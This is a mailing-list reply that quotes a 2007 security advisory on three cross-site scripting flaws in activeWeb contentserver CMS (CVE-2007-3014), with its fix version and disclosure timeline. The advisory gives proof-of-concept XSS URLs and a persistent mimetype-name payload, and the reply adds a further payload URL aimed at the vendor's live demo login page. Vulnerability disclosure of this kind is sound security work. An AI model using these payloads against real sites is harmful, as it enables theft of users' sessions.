Re: ActiveWeb Contentserver CMS Multiple Cross Site Scriptings

["Debasis Mohanty" <debasis.mohanty.listmails () gmail com>]

didn't find this in your list. Work for their online demo site not
sure if it works in actual deployment -

http://demo.active-web.de:80/sam.login/login.asp?org=>"><script>alert('xss');</script>&a=Y2FtcGZpcmU%253D&b=219f5bea94f21dc3e9207a32cfb69802&c=1c69e949%252D0941%252D46a1%252Da7b5%252D5a26b08548b1&d=58b69c32%252Dae15%252D4467%252Da02a%252D6c032b0f73b3&e=NThiNjljMzItYWUxNS00NDY3LWEwMmEtNmMwMzJiMGY3M2IzLWNhbXBmaXJl

don't miss to append other parameters as well -
&a=Y2FtcGZpcmU%253D&b=219f5bea94f21dc3e9207a32cfb69802&c=1c69e949%252D0941%252D46a1%252Da7b5%252D5a26b08548b1&d=58b69c32%252Dae15%252D4467%252Da02a%252D6c032b0f73b3&e=NThiNjljMzItYWUxNS00NDY3LWEwMmEtNmMwMzJiMGY3M2IzLWNhbXBmaXJl


-d


On 7/13/07, RedTeam Pentesting GmbH <release () redteam-pentesting de> wrote:
> Advisory: ActiveWeb Contentserver CMS Multiple Cross Site Scriptings
>
> RedTeam Pentesting discovered three Cross Site Scripting
> vulnerabilities in the activeWeb contentserver CMS during a penetration
> test. One of the Cross Site Scriptings is persistent.
>
>
> Details
> =======
>
> Product: activeWeb contentserver
> Affected Versions: <= 5.6.2929
> Fixed Versions: 5.6.2964
> Vulnerability Type: Cross Site Scripting
> Security-Risk: high
> Vendor-URL: http://www.active-web.de/aw/home/Produkte/~gf/contentserver/
> Vendor-Status: informed, fixed version released
> Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-005.php
> Advisory-Status: public
> CVE: CVE-2007-3014
> CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3014
>
>
> Introduction
> ============
>
> contentserver is the comprehensive, scalable Content Management System
> for professional requirements. It combines editorial system, website
> management and development platform for web applications in one package.
>
> (translation of the description on the vendor's homepage)
>
>
> XSS Error Page rights.asp
> =========================
>
> The variable "msg" of the ASP script "rights.asp" is not properly
> filtered.
>
> Proof of Concept
> ----------------
>
> http://www.example.com/errors/rights.asp
>   ?awReadAccessRight=True
>   &msg=<script>alert('XSS')</script>
>
>
> XSS Error Page transaction.asp
> ==============================
>
> The variable "msg" of the ASP script "transaction.asp" is not properly
> filtered.
>
> Proof of Concept
> ----------------
>
> http://www.example.com/errors/transaction.asp
>   ?msg=<script>alert('XSS')</script>
>
>
> Persistent XSS Mimetypes
> ========================
>
> As editors, users can add new mimetypes to the the system. The name of
> the new mimetype can contain arbitrary code. This allows for a
> persistent Cross Site Scripting.
>
> Proof of Concept
> ----------------
>
> As an editor, log into the management interface and add a new mimetype.
> For the name, use a script, e.g.
>
> <script>alert('XSS')</script>
>
> Everytime a user looks at the mimetypes, the code will be executed.
>
>
> Workaround
> ==========
>
> A possible workaround would be to use a filtering application set up in
> front of the real webserver, mitigating the risk of being exploited.
>
>
> Fix
> ===
>
> The vulnerability is fixed in release 5.6.2964.
>
>
> Security Risk
> =============
>
> The risk is high, as these XSS can be used e.g. to steal session cookies
> of logged-in users.
>
>
> History
> =======
>
> 2007-05-23 Problem found during a penetration test
> 2007-05-30 Vendor notified by customer
> 2007-06-01 Vendor called back and confirmed the vulnerability
> 2007-06-18 CVE number assigned
> 2007-07-11 Vendor released fixed version
> 2007-07-13 Advisory released
>
> The vendor was very cooperative. There was always a competent contact
> person available who answered any questions.
>
>
> RedTeam Pentesting GmbH
> =======================
>
> RedTeam Pentesting is offering individual penetration tests, short
> pentests, performed by a team of specialised IT-security experts.
> Hereby, security weaknesses in company networks or products are
> uncovered and can be fixed immediately.
>
> As there are only few experts in this field, RedTeam Pentesting wants to
> share its knowledge and enhance the public knowledge with research in
> security related areas. The results are made available as public
> security advisories.
>
> More information about RedTeam Pentesting can be found at
> http://www.redteam-pentesting.de.
>
> --
> RedTeam Pentesting GmbH                    Tel.: +49 241 963-1300
> Dennewartstr. 25-27                        Fax : +49 241 963-1304
> 52068 Aachen                    http://www.redteam-pentesting.de/
> Germany                         Registergericht: Aachen HRB 14004
> Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/